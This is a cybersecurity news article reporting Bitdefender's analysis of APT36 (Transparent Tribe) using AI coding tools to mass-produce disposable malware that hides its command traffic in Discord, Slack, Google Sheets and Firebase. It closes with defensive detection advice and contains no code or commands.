Transparent Tribe’s ‘Vibeware’ Shift Signals Rise of AI-Generated Malware at Industrial Scale

Pakistan-based threat actor APT36, widely known as Transparent Tribe, has shifted away from carefully crafted tools to a new approach called “vibeware” — AI-assisted malware produced in high volumes with little regard for quality.

Rather than investing time in one sophisticated piece of code, the group uses AI coding tools

to pump out dozens of disposable implants rapidly. The goal is not technical brilliance but sheer volume, overwhelming defenders with a constant stream of new samples that are hard to track individually.​

The campaign targets Indian government agencies, military personnel, and diplomatic missions, with secondary focus on Afghanistan’s government and several private businesses.

Attackers were found using LinkedIn to identify and profile high-value targets, having recovered screenshots of employee lists from military-related government agencies.

A recurring internal username, “Nightmare,” was found across the group’s own systems, suggesting a single operator or coordinated team sits at the core of this effort.​

Bitdefender analysts identified conclusive evidence of AI assistance within the group’s project files, including metadata pointing directly to AI-integrated code editors and Unicode emojis embedded in binary strings — both clear markers of vibe-coded development.

The group sustains a near-daily pace of new variant production across multiple programming languages.

Despite the volume, the tools are often error-prone and unfinished — one credential-stealing Go binary was found with a blank placeholder where its command-and-control server address should have been, making it completely nonfunctional from the start.​

Initial access is delivered through malicious emails carrying ZIP or ISO archives bundling shortcut (.LNK) files. A particularly effective lure uses a PDF document designed to look like a professional resume, featuring a large “Download Document” button.

Clicking the button sends the victim to an attacker-controlled server that delivers a malicious archive automatically. Once the shortcut executes, PowerShell scripts run silently in memory, pulling down and activating the primary backdoor.

After that, the operators connect to the compromised machine manually to carry out further steps — a reminder that while the malware pipeline is AI-driven, the hands-on hacking is still a human operation.​

How Vibeware Hides Behind Trusted Cloud Platforms

One of the most operationally effective aspects of this campaign is its heavy use of legitimate cloud services for command and control.

APT36 routes communications through Discord, Slack, Google Sheets, Supabase, and Firebase — platforms that corporate firewalls routinely trust, making malicious traffic difficult to separate from normal activity.​

CrystalShell, written in the Crystal language, uses Discord channels to issue commands and collect outputs from infected machines. Its counterpart, ZigShell, performs the same role through Slack.

SheetCreep, a C#-based backdoor, converts a Google Drive spreadsheet into a live control hub, polling it for encrypted instructions and writing encrypted responses back into cells.

LuminousStealer, built in Rust, sends stolen file metadata to Firebase while uploading actual file contents to Google Drive — all authenticated through standard Google OAuth.

The presence of Unicode emojis in LuminousStealer’s code strings, such as “ Sent folder metadata to Firebase” and “ Enumerating drive,” serves as further confirmation of AI-generated code throughout this fleet.​

AI tools make this strategy particularly easy to execute. Public SDKs and thorough online documentation for these services give AI coding assistants enough training material to generate stable, working integration code on demand, requiring minimal expertise from the attacker’s side.​

To defend against this type of campaign, security teams should prioritize behavioral detection over file-signature scanning, since niche languages like Nim, Zig, and Crystal can reset standard detection baselines entirely.

Outbound connections to trusted cloud platforms originating from unsigned or unverified binaries should be treated as potential indicators of compromise.

Scheduled task creation, process injection, fileless execution chains, and unusual PowerShell activity should all trigger immediate investigation, as this campaign relies on every one of them.

Maintaining an endpoint detection and response capability that flags suspicious process behavior — regardless of what language a binary was written in — remains the most reliable defense against a threat model built entirely on volume over skill.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Transparent Tribe’s ‘Vibeware’ Shift Signals Rise of AI-Generated Malware at Industrial Scale appeared first on Cyber Security News.